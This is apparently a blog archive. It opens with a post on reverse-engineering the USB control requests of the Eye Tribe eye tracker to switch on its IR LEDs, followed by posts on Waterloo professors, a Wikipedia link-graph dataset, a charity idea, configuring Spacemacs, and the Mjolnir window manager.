The Eye Tribe tracker is really just a USB 3.0 UVC camera (the standard webcam protocol) that shoots in monochrome IR. It also has bright IR LEDs that light up the user’s face since there isn’t much ambient IR indoors. Capturing the video is easy, the hard part is that the LEDs are controlled through a proprietary extension to the USB video camera protocol.

Thus I started on my quest to discover the special commands that would turn on those LEDs. In the end I figured out some cool techniques, and helped diagnose out my issue (haven’t solved it yet though). What could be useful to others is that the Eye Tribe is effectively a low cost (alternatives are >$500), high resolution, high frame rate IR camera with built in illuminators. This could be used for all sorts of computer vision projects like a cheap Vicon style motion capture system or an open source eye tracker.

Exploration

I started by installing USB Prober, a dev tool that lets you inspect the metadata of devices connected by USB. You can get practically the same information in the USB section of the built in “System Information” app but I installed USB Prober in case it gave more info.

I started looking through the USB info dump for the Eye Tribe tracker and discovered some good clues. First of all that it was a UVC camera, and that it was only a UVC camera, no other fancy USB control endpoints. I also noticed that there was a VDC (Control) Extension Unit interface: this was probably where the custom lights control messages could be sent.

I also figured out some other interesting things like the camera module being manufactured by Leopard Imaging and that it could capture high resolution 2304x1536 video at 27fps (that’s more than 1080p) and 768x1024 at 60fps. There are also a bunch of intermediate resolutions it can do at intermediate frame rates.

Attempting to Log

My next step was to try and log the USB traffic between the tracker and the eye tracking data server program The Eye Tribe provides. Unfortunately, Apple hasn’t updated the kernel extensions for USB logging for the latest OSs. Last time I tried installing them I nearly bricked my laptop because it couldn’t read any USB HID input, including the internal USB hub for the laptop’s keyboard and trackpad. I only rescued it by copying the Kext files from the recovery partition onto my main drive, I started backing up my entire disk instead of just my important files after that incident.

So instead I took the advice in this mail thread and tried usbtrace and dtrace instead. Unfortunately usbtrace showed megabytes per minute of all my system’s USB traffic in a not very useful format. dtrace showed me that control messages were being sent by the tracking server, and from what call stack, but not which messages and what they contained.

Disassembly

After logging failed, I tried a different approach. I downloaded the trial of Hopper 3 and loaded up the Eye Tribe server executable. Most of the method names were just numbered symbols but I managed to find an Objective C method called setUvcControl:withValue: that belonged to a class called UVCCameraControl. I tried tracing the callers to see if I could find any obvious light control code, but with no function symbol names, no source code, and only vaguely knowing x86_64 assembly, I wasn’t able to do it.

Instead I used class-dump on the server executable to look at the other methods. I Googled some of the method names and found it was open source (code on Github here). Now I had the source code for the mechanism used to send the messages, but I didn’t know what they were called with.

I read through the source of that class and started looking at the UVC protocol spec to make sense of what I found. I learned that auxiliary parameters of a camera are controlled and inspected by UVC control requests like SET_CUR and GET_CUR on different interfaces and with different control selectors. I figured out through reading the source code that the bit fields described in the protocol corresponded with the fields of OSX’s IOUSBDevRequest.

Debugging

I started on a new approach to try and log the control requests sent by the server through intercepting the method calls made by it. If I could print out the contents of the IOUSBDevRequest structs being sent, I could probably figure out which ones turned on the lights. So I fired up LLDB and set a breakpoint at the hex address of sendControlRequest: from the disassembly.

I started the server with the tracker connected and LLDB hit the breakpoint, but since there were no debug symbols, all I could look at was registers and assembly. I had no idea what the calling conventions were for Objective-C code and looking them up and peeking at some memory didn’t seem to find the right things. So I kept stepping and reached down into IOUSBInterfaceClass::interfaceControlRequest(void*, unsigned char, IOUSBDevRequest*) which although it didn’t have debug info, at least had an unobfustucated function name. I Googled this and found that Apple published the source code!

The registers and assembly weren’t helping me very much until after an hour or two I figured out how to find where the struct I wanted was located. The source code for IOUSBInterfaceClass::interfaceControlRequest(void*, unsigned char, IOUSBDevRequest*) showed it copying a IOUSBDevRequest into an IOUSBDevRequestTO and not much else. So I looked at the dissassembly for that method in the debugger and saw a bunch of mov instructions copying the fields of the struct. They all looked something like:

0x100ae2fb0 <+14>: movb   %al, -0x28(%rbp)
0x100ae2fb3 <+17>: movb   0x1(%rbx), %al

Aha! At that point the struct I want must be pointed to by register %rbp. I stepped to that point, and after a figuring out the right casting and pointer indirection I printed out the second byte:

(lldb) e (int)((char*)$rbx)[1]
(int) $22 = 129

The second byte of the struct I wanted should be the UInt8 bRequest field which should correspond to one of the constants in the UVCCameraControl. Sure enough after using irb to convert 129 to hex I got 0x81 which is the request code for UVC_GET_CUR, I had found it!

Logging (for real this time)

Now I needed to figure out how to print out the other fields and the data pointed to by the void *pData field. All fast enough so that the tracking server wouldn’t get messed up. My strategy for this was to try and script LLDB to break at the exact right instruction, print out all of the fields, and then continue automatically.

I read about LLDB’s Python scripting capabilities, but the Python interface was poorly documented and could only really do anything with debug info, which I didn’t have.

So instead I figured out all the right casting invocations to print out the fields of the struct, which took a while. Then I figured out the exact offset from the start of the dynamic library I wanted to break at (the absolute address changed every time I started up the tracking server), set a breakpoint there and added a breakpoint command which printed the fields and then continued:

breakpoint set -a <address of IOUSBLib I found>+0x7fae
breakpoint command add 1
e ((uint64_t*)$rbx)[0]
e ((uint64_t*)$rbx)[1]
p *(uint32_t(*)[15])(((uint32_t**)$rbx)[1])
e ((uint32_t*)$rbx)[4]
c
DONE

Then I ran the code, connected the eye tracker, started the tracking UI (which turns on the lights), waited a bit, and shut down the tracking UI (turning off the lights). It output a bunch of data which I copy pasted into some text files.

Analysis

Now I had a log of the control requests, but as a couple 64 bit decimal integers in a copy-pasted LLDB log. So I had to write a script to parse out the various fields of the IOUSBDevRequest struct. I did this in Ruby, eventually producing this script.

First I had to parse the format, then I used bitwise operators to extract the various fields of the struct out of the integers and into fields of a Ruby hash. Now I had the raw data from the struct, but all the fields were still opaque numbers: next I had to interpret them.

I started by going back to the UVC protocol spec and copy-pasted some of the name tables in the appendix into hash literals in my script. I tried using these to map the numbers to names, but ended up with weird results. Then came a couple hours of fiddling, confusion and reading, as well as looking at how the records were constructed and correlating that with the spec. After the 5th try at mapping I figured out which fields came from where: I had to use the Terminal ID from USB Prober to decide which table to look up the control selector (high byte of the wValue field) in based on the unitID field (high byte of wIndex).

Finally I got results that made sense: before the lights turned on the server sent a couple UVC_SET_CUR requests to the extension unit. It looked like this:

{:bmRequestType=>33, :bRequest=>1, :wValue=>768, :wIndex=>768, :wLength=>2, :selector=>3, :unitId=>3, :req=>"UVC_SET_CUR", :unit=>"VC_EXTENSION_UNIT"}
[15, 0]
{:bmRequestType=>33, :bRequest=>1, :wValue=>1024, :wIndex=>512, :wLength=>2, :selector=>4, :unitId=>2, :req=>"UVC_SET_CUR", :unit=>"VC_PROCESSING_UNIT", :msg=>"PU_GAIN_CONTROL"}
[63, 0]
{:bmRequestType=>33, :bRequest=>1, :wValue=>1024, :wIndex=>768, :wLength=>8, :selector=>4, :unitId=>3, :req=>"UVC_SET_CUR", :unit=>"VC_EXTENSION_UNIT"}
[250, 0, 240, 0, 250, 0, 240, 0]
{:bmRequestType=>33, :bRequest=>1, :wValue=>1536, :wIndex=>768, :wLength=>2, :selector=>6, :unitId=>3, :req=>"UVC_SET_CUR", :unit=>"VC_EXTENSION_UNIT"}
[44, 1]
{:bmRequestType=>33, :bRequest=>1, :wValue=>512, :wIndex=>768, :wLength=>4, :selector=>2, :unitId=>3, :req=>"UVC_SET_CUR", :unit=>"VC_EXTENSION_UNIT"}
[0, 0, 0, 0]
{:bmRequestType=>33, :bRequest=>1, :wValue=>1024, :wIndex=>512, :wLength=>2, :selector=>4, :unitId=>2, :req=>"UVC_SET_CUR", :unit=>"VC_PROCESSING_UNIT", :msg=>"PU_GAIN_CONTROL"}
[51, 0]
... more of the same message with small adjustments to the gain around level 51 ...
{:bmRequestType=>33, :bRequest=>1, :wValue=>1024, :wIndex=>512, :wLength=>2, :selector=>4, :unitId=>2, :req=>"UVC_SET_CUR", :unit=>"VC_PROCESSING_UNIT", :msg=>"PU_GAIN_CONTROL"}
[51, 0]
{:bmRequestType=>33, :bRequest=>1, :wValue=>768, :wIndex=>768, :wLength=>2, :selector=>3, :unitId=>3, :req=>"UVC_SET_CUR", :unit=>"VC_EXTENSION_UNIT"}
[0, 0]
{:bmRequestType=>33, :bRequest=>1, :wValue=>1024, :wIndex=>512, :wLength=>2, :selector=>4, :unitId=>2, :req=>"UVC_SET_CUR", :unit=>"VC_PROCESSING_UNIT", :msg=>"PU_GAIN_CONTROL"}

So it looks like there are a couple requests sent to the extension unit, but only selector 3 is sent with a positive value when the lights are turned on and later a zero when the lights are turned off.

Capture

Now I just had to test my theory by writing an app that sent the right UVC control requests. I used OpenFrameworks since it comes with a camera capture example that uses QtKit (which is deprecated but allegedly UVCCameraControl doesn’t work with AVFoundation). I linked in the ofxUVC addon but ended up just calling the Obj-C class directly. I started by fiddling with the gain setting and managed to even see myself a little bit without the IR illuminators turned on.

Then I tried sending selector 3 with a value of 15 to turn the lights on, and it worked first try! The lights didn’t turn off when I shut down my test app, but that was an easy fix of adding another control message setting it to 0.

Victory!

That picture is captured with a gain level of around 0 but I noticed in the logs that the tracking server was setting the gain level around 51. But when I adjusted the gain that high, the 8 bit green values used to hold the image started wrapping around leading to a messed up image. This might be the cause of the tracking quality issues I’ve been having, but the real server might do something to mitigate this. Edit: I’ve since discovered that lowering the exposure to compensate negates this issue, so I assume the real server uses a higher frame rate and lower exposure so they need the high gain setting. Another neat thing about the exposure is if you set it really long it can effectively take still pictures without the LEDs on.

Next I used the feature of the demo app to save a video to my drive, which interestingly started replacing some frames with pure green, which didn’t happen at all in the live preview. I later discovered that the 1 minute movie it saved was 10 gigabytes because it wasn’t using any compression. It is possible the dropped frames were my SSD bottlenecking the video capture. Anyhow I compressed it down with Handbrake and uploaded it to Youtube, sorry for the annoying green frames.

In the video below you can see me looking at the four corners of my screen, and then some things on the screen. I then slowly adjust the gain setting upwards until it reaches 51 at which point I wave my arms around to mark the time. Then I continue adjusting the gain up to maximum.

Update

After I first published this post I emailed The Eye Tribe with my info and story, and I got some help and info from them. It turns out that the eye tracker isn’t working in as large of an area as it should (not sure why) so I can only use a 12” diagonal area of my screen instead of the full 24”. If I use the small area I get much better accuracy, closer to +/- 1cm of jitter and a 0-4cm offset from my true gaze location. This is still not as good accuracy as advertized and it works on a much smaller area than advertized, but it is better than before. It is still entirely useless to me though, the accuracy is good enough for my project, but the area is too small. Note that I have seen videos of other people achieving the claimed accuracy, it is likely that there is still some special complicating factor with my unit or setup, most customers probably have no issues.

This is post is also not ment to bash The Eye Tribe. They’re my second favourite eye tracking company after Pupil Labs. Despite their closed source software they are still significantly more open than most other eye tracking companies with orders of magnitude lower cost.

Update 2

I’ve now figured out how to properly retrieve high resolution 60fps video at the full 10 bit depth. The tracker has a variety of resolutions available, higher resolutions only work with lower frame rates. The highest resolution is 2304x1536 which is available at 27FPS. Some of the resolutions offered are scaled down versions of the full image, whereas others are cropped areas of it. In order to get the full 60FPS you have to lower the exposure time, which significantly increases the noiseness of the image.

The pixels are encoded in YUY2 format where the lowest 8 bits of brightness are in the Y component and the highest 2 are in the UV component.

I’ve created a project on Github called SmartGaze where I’ve done a little bit of work on implementing eye tracking algorithms for the Eye Tribe. So far I’ve retrieved the raw feed using libuvc, found the eye regions using glints, and then used an implementation of the Starburst algorithm to locate the iris ellipse. The repo is released under the GPLv2 but an earlier commit containing just the code to read the raw 10 bit feed is released under the MIT license. I may or may not decide to finish this given that I recently got a Steelseries Sentry that works well for me when I run it in a Windows VM and pipe the data over UDP to my mac.

Here’s a video of the raw feed. The fact that you can hardly see the pupils in this video is a product of how I reduced the 10 bit image down to 8 bits, as well as not setting the PU_GAIN UVC control. More recent commits of SmartGaze use a much brighter video, but one that washes out details of the face.

Amazing Profs of Waterloo 2015

2015-11-19T00:00:00+00:00

During my three terms at The University of Waterloo so far every single professor I’ve had has been quite good. Some however, are amazing. Each of these amazing profs is amazing in very different ways. Some are great lecturers, some great teachers and some great people.

In this post I’ll highlight some of the great professors I’ve had so far and what makes them amazing.

Prabhakar Ragde (CS 146) - The Educator

Prabhakar is the most dedicated teacher I have ever had. He spends an incredible amount of time and effort refining his lecture material and designing his courses to be the best they can be. He goes above and beyond to make sure that students learn in the best way possible. He had some trouble finding a good way to teach self-balancing binary trees, so he went and did original research and formulated a purely functional self-balancing binary tree data structure that’s main advantage is to being easier to learn. It seems to almost physically pain him to see something not taught well. Every teacher should aspire to be as good at teaching as Prabhakar is.

Protip™

He teaches the advanced CS courses in first year, but he teaches them so well that for many people they are easier than the normal courses. The material is indeed more advanced, but the assignments are less work and the tests have bonus marks so it is easier to get high marks. I highly recommend taking CS 145 and 146.

He is also addicted to Twitter, follow him if you want to know about all the fancy food he eats.

Jan Kycia (MNS 101) - The Renaissance Man

Jan’s lectures are good, he’s an effective speaker and does very neat physics demos in class. What is really incredible about him is his breadth and depth of knowledge. Never in my life have I met anybody so knowledgeable in so many different fields. He’s a physicist by training, but also knows a ton about electronics, engineering, machining, measurement, plumbing, materials and really cold things. He leads a low temperature lab (he says “millikelvin” a lot) where he uses all these skills to build some highly impressive things. Have I mentioned he’s also really nice and friendly?

I would say that “Any sufficiently advanced technologist is indistinguishable from a wizard” except that Jan will gladly show you all of his tricks if you ask. I have an incredible amount of respect for Jan and look up to him as a model of a truly formidable human being.

Protip™

After every class for around 40 minutes he answers student questions, goes on interesting tangents, and sometimes gives lab tours and descriptions of his research. It is very much worth your time to stick around for these, I have never once regretted staying after class to learn new and interesting things from him, even if they aren’t part of the course. Especially follow him whenever he brings students down to the lab to pick up assignments, that place is a technological wonderland and he gives amazing tours and research overviews if you ask.

Also, MNS 101 (an introduction to material science) is a great course to take. It is very interesting and is a science that most people haven’t had any exposure to in high school.

Things I have seen in his lab

Custom-designed electronic measurement equipment.
High-precision custom-machined heat pumps.
Custom-made vibration isolating vacuum pipe flextures.
Superconducting silicon wafer integrated circuits custom-fabricated in house.
Decades-old equipment that he has scavenged for pennies on the dollar and then painstakingly fixed up to working condition.

Examples of things he has talked about after class

The little-known secrets to creating incredibly pure samples of a material using a plasma arc melter, electrical discharge machining, acid baths, and many other steps.
How to procure an x-ray crystallography set-up on the cheap by buying used DNA flourescence scanners from hospitals.
The different types of superconducting and non-superconducting wire to use at temperatures approaching 0 kelvin.
The design factors to take into account when reducing vibrational heating through pipe flextures that must handle vacuum forces.
How to create strong non-heat-conductive supports by cutting up carbon fiber hunting arrows.

Eric Helleiner (PSCI 150) - The Lecturer

Helleiner’s lectures just make you want to listen. He’s enthusiastic about what he teaches in a very friendly way. I just really like listening to him talk about interesting political science things. He’s also knowledgeable and teaches interesting PSCI classes, but the reason he’s on this list is that his lectures are just really enjoyable.

Protip™

Go to his office hours some time, maybe bring a friend, and just talk to him about interesting politics things. I skipped class to do this once and me and my friend chatted with him for over an hour.

Wikipedia Link Graphs and Terrible Hacks

2015-03-30T00:00:00+00:00

A couple months ago Dave Pagurek and I decided on making an arbitrary scale finder for the upcoming UWaterloo “stupid shit no one needs” hackathon. I decided that I would do this by finding paths in the links between Wikipedia pages. The thing is to do this I needed a good data set in the right format.

I did some research and found Six Degrees of Wikipedia which had some information but no data or source files. I then found Graphipedia but discovered that Neo4j was not fast enough to do what I wanted. Thus I embarked on the adventure of creating my own Wikipedia link graph data set designed for efficient execution of common graph algorithms. The premise was compressing the whole graph into a small(ish) file that would fit entirely in memory, so I called it Wikicrush.

I spent the next few weeks occasionally working on a set of Ruby scripts that in multiple stages processed the 10GB compressed enwiki-20150205-pages-articles.xml.bz2 file into two 500mb files: xindex.db and indexbi.bin. For each stage in the process I ensured that it worked in O(n) time and reasonable memory. This way I could use crunch through the entire thing over a day on a cheap VPS. During development I would use the smaller Simple English wiki which I could process in a few minutes on my laptop. The advantage of the multi-stage design is that if I needed to tweak something I could just re-run the stages after that point rather than the whole thing. The intermediate files it created were also very useful for debugging and could be useful data sets in their own right.

I ended up with two files I’m rather proud of, one is a binary link graph in a custom format I designed myself designed to fit in memory and allow very efficient searching and processing. The other is simply an Sqlite index designed to translate article titles into offsets into the binary file and back again. The formats are fairly easy to work with in any imperative language and have many handy features. I documented the formats in detail in the Wikicrush readme. They work so well that my $10/month VPS can easily breadth first search through millions of articles in less than a second.

I had the initial version working fairly quickly but had to spend a bunch of time fixing small bugs to get it to accurately represent the actual link graph of Wikipedia. I had to fix things like following redirects, cutting out broken links, ignoring links in comments and proper handling of case in links (I ended up lowercasing everything). Although making your own Wikipedia data set may seem easy at first, there’s plenty of ways things can go wrong. Many times I thought I had a good complete data set and only later would I realize something was wrong. One time I thought I had finally worked out the kinks and then discovered weeks later that it thought 70% of links on Wikipedia were invalid, which obviously isn’t true. Even just yesterday I found and fixed a little bug that only affected 300 articles, but the perfectionist in me sent my VPS to slave away for another 40 hours of rebuilding.

Edit: I recently found another glitch and overhauled the entire process to be more robust. I now think I’ve shaken out all the bugs so I have put up a download of the final product. You can find the link on the Wikicrush readme. I also no longer need to lowercase everything. This is AFAIK the only Wikipedia link graph dataset available for public download.

The Terrible Hacks Hackathon

During the hackathon some parts went very smoothly while others did not. Working with the files I had created was very easy, working with the Rust language for my first time was not. At some point I could not link my graph search algorithm to the Iron web framework because my algorithm and Sqlite connection were not thread safe and one can not disable type system based thread safety checks in Iron with Rust. I ended up with a suitably terrible hack which was having the Rust code communicate over stdin/stdout and having a Ruby Sinatra server interface with that. Along with that, all the paths were hard coded, it required a specific rustc commit and one had to manually fiddle with the Cargo.toml and Cargo.lock files to work around a bug in Cargo just to get it to compile. This made it practically impossible to install and run on anything but my laptop.

I eventually got things hacked together and by that time Dave had put together a fantastic front end with fancy CSS, autocomplete and REST loading. All I had to do was serve his static files and expose a JSON API.

Once we did that we had a product, and it ended up working great. The paths it generated were amusing and it was fun to use. Not to mention it looked pretty good for something put together in one afternoon:

The Rewrite

A week later I decided to kill two birds with one experimental statically-typed stone and learned the Nim language by rewriting the project in it. I ran into a couple similar problems with the Jester web framework and loading the file into an int32 array but unlike the similar problems in Rust these had easy workarounds. In the end everything worked reasonably well with Nim especially after I got some help on IRC from its creator.

You can now visit and try out Rate With Science powered purely by Nim and backed by Wikicrush.

Idea: A Viral Industrial Charity

2015-03-14T00:00:00+00:00

Deviating from the usual programming content of this blog I’d like to talk about an idea I’ve been thinking about recently. This week I went to a talk by Lewis Dartnell author of the most interesting non-fiction book I’ve ever read called The Knowledge. It’s a book that explores the essential science and technology necessary to build a modern society from the perspective of bootstrapping civilization after the apocalypse. The apocalypse is merely a convenient thought experiment though, its a fantastic read just to learn about all the hidden industrial processes and science that keeps the world working today.

Personally the book got me thinking about how this idea of bootstrapping might help in the modern world. I also learned about the fundamental behind the scenes industrial processes that keep the world running, like the Haber-Bosch Process and the production of fundamental chemicals like lime. It gave me huge respect for how incredible difficult it is to create an industrial civilization.

The most interesting idea I’ve thought of, and I’m sure this idea isn’t unique, is the possibility of a viral industrial charity. Suppose there exists a set of machinery, tools and knowledge which a group of people can use to produce a second set of machines in a reasonable time span like one year. The other criterion for these machines are that they can be used to productively ensure a decent standard of living for those working on reproducing them.

If funding could be found to build one set of these machines, they could be set up in a third-world country as a kind of employer. A group of 100 or so people would be trained to use the machines and they would work to produce a new set and be compensated with the right to use the machines to provide themselves with good housing, food and other useful things. The magic comes once they finish the second set of machines and can use it to establish another village. Now there are two villages producing new sets and exponential growth takes hold, with luck the charity could grow to create thousands of new industrialized villages per year. With the only infusion of charity capital being the initial set, some management and perhaps a small kit for each new village of very difficult to produce items like machine control computers.

This is by no means a perfect plan, there are many potential issues. Chief among them is that this set of machinery does not yet exist. Technology is awesome but it is also hard and highly interdependent. It is difficult to satisfy both of the dual criteria of having no external dependencies and being useful for sustaining an independent village. There is a project called the Global Village Construction Set that is trying to do just this but it is slow and difficult. They have some great ideas but designing all these machines is a lot of work and they have not solved the closed dependency problem despite trying very hard. Many of their machines require some external parts such as ball bearings and microcontrollers, which need very precise dedicated machinery to produce. It is likely that any set of reproducing machines might need a box of small precision parts like ball bearings and integrated circuits to close the cycle. However, if this box is cheap enough a charity could support the exponential growth without too much fund raising.

The other technological challenge is resources. For the village to be self-sufficient it would have to produce its own materials and food. Farming can be done in many locations especially with good tools, but natural resources are often very spread out. The solution to this is probably to make everything out of a minimal set of different materials that are produced from very common natural resources. One idea from the Global Village Construction Set is the possibility of electrolyzing aluminum from clay. Clay is very common, easy to extract and can be used to make bricks, ceramic objects and aluminum metal (with some difficulty). A village built near a clay deposit, a river and some fertile land for farming with some natural or planted woodland nearby might be able to produce all the resources it needs. The village may still need to do some trading perhaps of aluminum for scrap steel to produce high stress specialized parts though, steel mining and refining is likely beyond the capability of a small village yet steel is necessary for many useful machines.

The other thing to think about is the charity structure itself. It has the virtue of not being very dependent on the external economy and enabling self-sufficiency. However, it does require at least some managerial and government structure to ensure that the people living in the village continue producing new sets of machinery instead of just using them to satisfy their own needs. This should be possible in any country with a decent government, it could probably be set up legally as an employer, albeit an unconventional one. Villagers who stopped producing machinery would be breaking the law in the same way as factory employees would be if they started stealing the output of the factory and taking it home. And I’m sure the occupants/employees would at least feel content with the idea that the purpose of their hard work is to help lift others out of poverty. They would of course also be compensated with a standard of living higher than they were used to.

As long as no one has designed this theoretical village this plan remains just an idea. However, the Global Village Construction Set is doing a great job and it is possible that years in the future it will be polished enough that with some start up capital and planning this could be a real endeavour. For my part I might even try to help design some of the machines on their to-do list as a fun hobby and way of learning about machinery.

For anyone who found the content of this post interesting, I highly recommend you read The Knowledge and take a look at the wiki for the Global Village Construction Set. I just thought I’d put this idea out there to see if anyone else has comments on it, I by no means think this is a perfect plan and it likely would have many practical tripping points. However, if these problems could be solved its potential impact per dollar invested is amazing.

Configuring Spacemacs: A Tutorial

2015-03-07T00:00:00+00:00

Edit: Some things in this post are now outdated. I’m currently using Sublime Text with Vim keybindings instead of Spacemacs so I haven’t been keeping up. I’ve fixed some things (Thanks Fabien!) but others may remain. If you want to fix something outdated submit a PR to my website.

A few months ago I switched to using Spacemacs as my text editor of choice. It has great vim keybindings and extensive default configs for a variety of packages. I’ve become one of the top contributors to Spacemacs and I’ve learned a few things about configuring it in the process. This post will function as a tutorial to get you started with configuring Spacemacs to your liking.

You can get started using Spacemacs by following the installation instructions in the readme and perusing the in-depth documentation.

The .spacemacs File

The ~/.spacemacs file is your main starting point for configuring Spacemacs. If you don’t have this file you can install a template pressing SPC : dotspacemacs/install RET in Spacemacs, where SPC is space and RET is the enter key. At any time you can press SPC f e d to edit this file.

The template comes with many variables that you can customize and use to set things like font sizes and window preferences. Once you are done editing, save the file and either press SPC f e R in the file to reload it or just restart Spacemacs.

Some parts of this file are more important than others:

dotspacemacs/user-config

This function is run after Spacemacs sets itself up, in here you can customize variables and activate extra functionality you want. Perhaps the most important thing to know is that this is generally where you can paste random snippets of Emacs Lisp you find on the internet. If a page says to put a snippet into your init.el file don’t do that, put it in dotspacemacs/user-config instead.

Another thing this function is useful for is setting the default state of some toggleable editor preferences. If you press SPC t you will see some of the things you can toggle, these include line numbers, line wrapping, current line highlight, etc…

Most of these toggles actually enable and disable “minor modes”, if you want some of these on or off by default you can put things like these in your dotspacemacs/user-config function:

(defun dotspacemacs/user-config ()
  (global-hl-line-mode -1) ; Disable current line highlight
  (global-linum-mode)) ; Show line numbers by default

dotspacemacs-configuration-layers

This brings us to configuration layers the most core concept of Spacemacs. Not all parts of Spacemacs are enabled by default, there are a large number of user contributed “layers” that add packages and configs for things like programming languages, external tools and extra functionality. Layers specify which packages they want Spacemacs to install for them, how to load the package and often include some default configs to make the package integrate well with the rest of Spacemacs.

The dotspacemacs-configuration-layers variable, set in the dotspacemacs/layers function near the top of the template is where you specify which layers you want to include. When you find yourself wondering “does Spacemacs come with support for X?” you can simply type SPC f e h and search through the built in layers. Once you find one you want to include simply include it in the list in the variable set statement. This is what mine looks like:

dotspacemacs-configuration-layers '(extra-langs auctex
  company-mode git c-c++ haskell html javascript ruby ycmd
  smex dash colors lua trishume markdown finance)

Yah, I use a lot of layers; you should too, they’re pretty important! You can see staples like “html” and “ruby” as well as fancier functionality ones like “company-mode”. Try looking through the “layers” directory to see all the available contributed layers and their Readme’s and source code.

Your Own Layers!

You too could be the author of your very own layer! In fact, you’ll likely find you want to after you have used Spacemacs for a while. The most important purpose of layers is adding MELPA packages and the configuration and keybindings for them. Don’t try and just install packages with the default Emacs package manager like the internet might tell you to do!

If you want to install a package you found online, like 2048-game, you’ll want to create a layer that includes the package and sets it up. Another option for small things is to add the package to the dotspacemacs-additional-packages list. There are a couple of places you can put this layer, which is really just a folder with some emacs lisp files:

The “private” Directory

This is a folder in the main Spacemacs directory where you can put configuration layers for your own personal use. You can create a template layer in this directory using <SPC> : configuration-layer/create-layer RET.

The descriptive comments in the template packages.el do a pretty good job of explaining what to do. Basically you add the package you want to include to the yourlayernamehere-packages list and then create yourlayernamehere-init-yourpackagenamehere functions where you use use-package to load the package and set it up. Take a look at existing layers for examples of how to set up packages and keybindings.

Once you have written a layer you have to load it in .spacemacs just like any other layer. Add your layer’s name to dotspacemacs-configuration-layers.

dotspacemacs-configuration-layer-path

If you want to keep your layers in a git repository or Dropbox sync or some other folder, you can use the dotspacemacs-configuration-layer-path variable in .spacemacs to set another folder where you can load layers from. Then you can just copy the layer directory that Spacemacs puts in the private directory into this directory and Spacemacs will be able to load it from there.

The “contrib” Directory

If you are adding some awesome new functionality to Spacemacs, which you probably are, you should seriously consider contributing it back. This is how Spacemacs has grown into the awesome distribution that it is. Don’t worry about people finding it hacky or not useful, we won’t mind and might even help you make it better.

This is what I do, I’m proud to say that I only have 1 private layer, every other layer I’ve written has been contributed back to Spacemacs. It’s as simple as forking Spacemacs, adding your layer to contrib and submitting a Github pull request.

Tips For Writing Layers

There’s a couple things that are nice to know when writing layers. The most important thing to know is some of the features of use-package. You use this in the init functions in packages.el to load the package and set it up. The function takes a package name and some attributes containing things like functions to run on load. You use use-package instead of doing whatever loading step the package readme tells you to do, generally you don’t include things like (require 'blah).

Basic Format

(defun finance/init-ledger-mode ()
  (use-package ledger-mode
    ; Use :mode to set language modes to automatically activate on certain extensions
    :mode ("\\.\\(ledger\\|ldg\\)\\'" . ledger-mode)
    ; :defer t activates lazy loading which makes startup faster
    :defer t
    ; The code in :init is always run, use it to set up config vars and key bindings
    :init
    (progn ; :init only takes one expression so use "progn" to combine multiple things
      ; You can configure package variables here
      (setq ledger-post-amount-alignment-column 62)
      ; Using evil-leader/set-key-for-mode adds bindings under SPC for a certain mode
      ; Use evil-leader/set-key to create global SPC bindings
      (evil-leader/set-key-for-mode 'ledger-mode
        "mhd"   'ledger-delete-current-transaction
        "m RET" 'ledger-set-month))
    :config ; :config is called after the package is actually loaded with defer
      ; You can put stuff that relies on the package like function calls here
      (message "Ledger mode was actually loaded!")))

Things that aren’t packages

If you want to bundle up some snippet or config that isn’t related to a package you can use the config.el file in the layer. In here you can just put Emacs Lisp code and functions that will be evaluated when a layer is loaded.

Dependencies

Sometimes you want to hook something in your layer into another package. This is most common for making sure your alayer works well with default packages like smartparens. To do this you’ll want to use eval-after-load. Here’s an example of a package adding extra functionality to yaml-mode.

Other Information

This guide hopefully gave you enough info to get started, but there’s so much more to Spacemacs that isn’t here. There’s a bunch of other sources of information that you should look at if you can’t find what you want:

The Gitter Chat

Please visit the Gitter chat room if you have any questions about configuring or using Spacemacs that you can’t figure out, or just come to chat with other Spacemacs users. There’s always tons of knowledgeable people there, including the awesome maintainer @syl20bnr, who will help you out.

The Documentation

Most of these layer concepts and mechanics are explained in depth in the massive Documentation. It also has information on lots of the functionality available in Spacemacs.

The Source Code!

If you want deep insight into the workings of Spacemacs you should really take a look at the source code on Github. The main difference between me and the average Spacemacs user is that I have read lots of the source and thus I know a lot about how Spacemacs works. I swear it’s really not that complicated, you’ll discover that most of Spacemacs is actually just the spacemacs layer which is just like any other configuration layer except it is included by default. You can also read the code for the contrib layers for ideas, although the techniques these use might be less consistent since they were written by lots of differnt people, many of them newbies. For a good start I recommend skimming through this packages.el file. You can also use SPC h SPC to search for layers and hit enter to visit their source.

Conclusion

I hope this helped you on your way to become a Spacemacs power-user. This guide was rather specific to configuration but I plan on maybe writing other tutorials on basic use and other tips. Don’t forget to say hi to me and all the other awesome Spacemacs people in the Gitter chat, we always love hearing from other Spacemacs users!

Using Mjolnir: An Extensible OSX Window Manager

2014-12-02T00:00:00+00:00

Edit: I am now using Hammerspoon which is a fork of Mjolnir that is basically the same except it comes with the modules (no luarocks), it’s under active development and the naming is slightly different and more consistent. Most of this article still applies.

Recently I started using the amazing and highly configurable window manager called Mjolnir. But really it isn’t a window manager, it’s an OSX wrapper around a Lua configuration file and event loop that has a constellation of modules that allow you to configure all sorts of computer control tasks. The most common use for Mjolnir is managing Windows but there are all sorts of modules that allow you to use it for doing things like unmounting your USB drives when you switch to battery power.

Two years ago I wrote a blog post about configuring Slate, the configurable window manager that I had been using until this month. However, the maintainer hasn’t worked on Slate in years and there are dozens of pull requests sitting around without merge and comment. There have been attempts to revive it, but there were still some rough edges and I decided to try something new.

Here I’ll describe how I use Mjolnir and my experience with it so far.

Getting Started

The instructions on Mjolnir’s homepage are pretty good as far as getting Mjolnir installed goes. You’ll need to get luarocks working and then create an init.lua file, which isn’t very hard. The basic install you get can’t do much so you’ll have to use some of the many Mjolnir modules. Before you use a module you have to install it first, to install mjolnir.hotkey you would run

luarocks install mjolnir.hotkey

Window Management

Mjolnir makes managing windows really easy with great modules to help you with this most of which are built upon the basic functionality found in mjolnir.application. That module provides basic access to running applications and their windows, which modules like mjolnir.bg.grid use to provide things like the ability to move windows around and resize on a grid. There are even fancier modules like mjolnir.tiling which automatically organize your windows like a fancy Linux tiling window manager would do.

Basic Key Bindings

Generally the way you want to start is by binding actions (really just Lua functions) to keys using the mjolnir.hotkey. Here’s an example from the Mjolnir homepage of binding a key that just nudges a window right:

hotkey.bind({"cmd", "alt", "ctrl"}, "D", function()
  local win = window.focusedwindow()
  local f = win:frame()
  f.x = f.x + 10
  win:setframe(f)
end)

Since it’s just Lua code you can also just directly pass function names and use variables to refer to common chords:

local mash = {"ctrl", "shift"}
hotkey.bind(mash, "c", mjolnir.openconsole)

Using a Grid

